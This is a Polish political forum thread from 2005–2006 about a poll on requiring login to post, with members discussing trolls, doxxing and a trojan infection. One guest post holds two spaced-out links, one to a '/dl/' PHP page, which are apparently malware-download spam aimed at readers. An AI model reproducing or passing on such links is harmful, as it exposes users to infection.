IVRP.pl Strona Główna IVRP.pl
polityka - militaria - kultura - podróże

FAQFAQ  SzukajSzukaj  UżytkownicyUżytkownicy  GrupyGrupy
RejestracjaRejestracja  ZalogujZaloguj  AlbumAlbum  DownloadDownload

Poprzedni temat «» Następny temat
Logowanie tak czy nie?

pisanie dla zalogowanych a czytanie dla wszystkich - tak czy nie?
tak
100%
 100%  [ 12 ]
nie
0%
 0%  [ 0 ]
Głosowań: 0
Wszystkich Głosów: 12

Autor Wiadomość
macsoc 
Emerytowany Ojciec Dyrektor

Wysłany: Sob 03 Gru, 2005 17:28   Logowanie tak czy nie?

Sprawa prosta: pisanie dla zalogowanych a czytanie dla wszystkich - tak czy nie?

mamy 234 zalogowanych użytkowników, z czego 94 (wyłączając użytkowników nowych tj. z ostatniego miesiąca) nigdy nie napisalo nic na forum, co daje liczbę 140 głosów.

Przyjmuję, że aktywni członkowie naszej społeczności wypowiedzą się na ten temat tym mini - referendum, ale oczękuję nie mniej niż 35 głosów wogóle. Poniżej tej liczby będzie to tylko sondaż.

proponuję by moderatorzy i administracja wypowiedziała się w kolejnej kolejności :lol:

qwerty 
sympatyk

Wysłany: Nie 04 Gru, 2005 01:34   Logowanie tak czy nie?

Mam wrażenie że po to zostało wprowadzone logowanie aby zachować ciągłość wypowiedzi i odbioru wiadomości przy jednoczesnym zachowaniu jakiegoś poziomu kultury wypowiedzi. Osoba goszcząca może napisać każdy tekst, obrazić wszystkich, negować podstawy powstania tego forum i nigdy więcej nie wrócic na naszą stronę.
Jestem za logowaniem ponieważ jak chciałem być na forum to się zalogowałem a więc inni też mogą to uczynić, chyba że boją się podać choćby odrobinę danych o sobie.
Co do użytkowników nic nie piszących na forum to może zbyt ostre ataki często poniżej pasa odstraszają ich od wypowiedzi.Mnie na początku to wyraźnie się rzuciło w oczy.

Z pozdrowieniem -qwerty.

Akiko 
Banita

Wysłany: Nie 04 Gru, 2005 10:07   Re: Logowanie tak czy nie?

qwerty napisał/a:
Mam wrażenie że po to zostało wprowadzone logowanie aby zachować ciągłość wypowiedzi i odbioru wiadomości przy jednoczesnym zachowaniu jakiegoś poziomu kultury wypowiedzi. Osoba goszcząca może napisać każdy tekst, obrazić wszystkich, negować podstawy powstania tego forum i nigdy więcej nie wrócic na naszą stronę.
Jestem za logowaniem ponieważ jak chciałem być na forum to się zalogowałem a więc inni też mogą to uczynić, chyba że boją się podać choćby odrobinę danych o sobie.
Co do użytkowników nic nie piszących na forum to może zbyt ostre ataki często poniżej pasa odstraszają ich od wypowiedzi.Mnie na początku to wyraźnie się rzuciło w oczy.

Z pozdrowieniem -qwerty.

Podzielam wypowiedz poprzednika.
W jednym z watkow jakis gosc z uporem maniaka podaje imie i nazwisko osoby tutaj piszacej i posty sa nie odessane. Jutro poda dane ktoregos z nas lub nieprawdziwe szkalujace informacje. Psychopatow , oszustow NETOWYCH JEST bardzo duzo.

Pozdr.

Super-MOr 
członek zarządu koła

Wysłany: Czw 29 Gru, 2005 05:05   

A nie mozna zrobic takich zabezpieczen, zeby przymus logowania nie byl ostatnim ratunkiem?

Gość

Wysłany: Czw 29 Gru, 2005 12:09   

MOr napisał/a:
A nie mozna zrobic takich zabezpieczen, zeby przymus logowania nie byl ostatnim ratunkiem?

Zrobic mozna! ale trzeba umic:lol:

Hacker
Gość
Wysłany: Czw 29 Gru, 2005 12:10   XXX

MOr napisał/a:

Zrobic mozna! ale trzeba umic:lol:

Gość

Wysłany: Czw 29 Gru, 2005 12:14   

Tak..logowanie!!

Gość

Wysłany: Czw 29 Gru, 2005 13:02   takkkkkkkkk

Anonymous napisał/a:
Tak..logowanie!!

[web]http :/ /iframebiz.biz/dl/adv435.php[/web]
[web]http :/ /je.pl/ouhu[/web]

Uciekinier z RP
Gość
Wysłany: Czw 29 Gru, 2005 23:52   trojan horse

Nie rozumiem. Jak to jest mozliwe zeby uczestnik forum infekowal innych uczestnikow forum koniem trojanskim, wirusem. Jak jest to mozliwe? Czy ktos jest w stanie to wyjasnic, w zrozumialym jezyku?

Kazde forum, ktore wprowadza obowiazek logowania traci. Traci bardzo duzo. Kontrolowac, kontrolowac, kontrolowac i jeszcze raz kontrolowac........Az nie chce mi sie uwierzyc, ze ta idea ogarnela to forum. Boze!

macsoc 
Emerytowany Ojciec Dyrektor

Wysłany: Pią 30 Gru, 2005 09:16   Re: trojan horse

Uciekinier z RP napisał/a:
Nie rozumiem. Jak to jest mozliwe zeby uczestnik forum infekowal innych uczestnikow forum koniem trojanskim, wirusem. Jak jest to mozliwe? Czy ktos jest w stanie to wyjasnic, w zrozumialym jezyku?

Kazde forum, ktore wprowadza obowiazek logowania traci. Traci bardzo duzo. Kontrolowac, kontrolowac, kontrolowac i jeszcze raz kontrolowac........Az nie chce mi sie uwierzyc, ze ta idea ogarnela to forum. Boze!
też się nie znam, ale tak długo jak nie zmieniłem post powyżej chciało się mnie coś wgrać

Gość

Wysłany: Pią 30 Gru, 2005 09:30   

haker moze zainfekowac..chory psychicznie haker..

Edwill 
baron wojewódzki

Wysłany: Śro 12 Kwi, 2006 04:01   Re: Logowanie tak czy nie?

macsoc napisał/a:
Sprawa prosta: pisanie dla zalogowanych a czytanie dla wszystkich - tak czy nie? >>>

TAK :!: Po zalogowaniu sie, niektorzy piszacy beda bardziej myslec, co pisza.

Goscia nic nie ogranicza... w pisaniu glupstw. :wink:

Półkownik 
Stary Basior

Wysłany: Czw 20 Kwi, 2006 19:40   

Logowanie jak najbardziej. Dzięki temu mamy z głowy świrów internetu. Ale logowanie, czyli podanie swych danych osobowych właścicielowi Forum nakłada na niego obowiązki dochowania tajemnicy naszych ujawnionych mu personaliów. Zatem po pierwsze właściciel forum musi być pewien ochrony swego forum przed hakusiami. Już kilka razy wskazywałem na to, i nie tylko ja, przy okazji trudności z wysyłaniem postów. A dzisiaj dostałem nowy pasztet. Otóż na mój adres mailowy otrzymałem bezpośredni tekst w j. angielskim, zaczynający się od słów "Dear polkownik". O tym, że tak podpisuję swoje posty wiem tylko ja i właściciel forum. Nawet nikt z mojej rodziny, nie zna mojej "ksywy". Tenże tekst oczywiście wywaliłem od razu, bo zdaje sobie sprawę z tego, co mogą hakusie, gdy zbyt długo będę się przyglądał "ichniej korespondencji".
Dodatkowo niniejszy post kieruję do dyskusji na temat, kto może być moderatorem, a kto nie, i co nam uczestnikom forum wolno, a czego nie.
Najpierw zadbajcie o antyhakusiowe bezpieczeństwo forum, a później licytujcie, kto może i co może. Bo będzie powtórka z PRL, a Wy szanowni ojcowie macie w swym logo IV RP. I wydaje mi się, że to do czegoś zobowiązuje.

Odpowiedz do tematu